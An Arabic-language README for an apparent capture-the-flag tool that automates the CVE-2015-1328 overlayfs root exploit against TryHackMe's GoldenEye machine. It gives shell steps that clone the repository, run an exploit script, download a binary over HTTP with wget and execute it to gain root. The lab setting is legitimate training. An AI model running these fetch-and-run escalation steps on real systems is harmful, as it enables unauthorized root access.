
استغلال النواة
إن تنفيذ overlayfs في حزمة linux (المعروفة أيضًا باسم Linux kernel) قبل الإصدار 3.19.0-21.21 في Ubuntu حتى 15.04 لا يتحقق بشكل صحيح من صلاحيات إنشاء الملفات في دليل نظام الملفات العلوي، مما يسمح للمستخدمين المحليين بالحصول على وصول الجذر (root) من خلال استغلال تكوين يُسمح فيه بـ overlayfs في مساحة أسماء تركيب (mount namespace) عشوائية.
شكرًا لـ rebel
هذا استغلال آلي لـ CVE-2015-1328 لـ GoldenEye CTF من TryHackMe افتراضيًا، لا يتوفر gcc على تلك الآلة، لذا قمت بإعداد gcc إلى cc وبناءً عليه قمت بتشغيل الاستغلال للحصول على صلاحيات الجذر.
التثبيت
فقط، استنسخ هذا المستودع -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit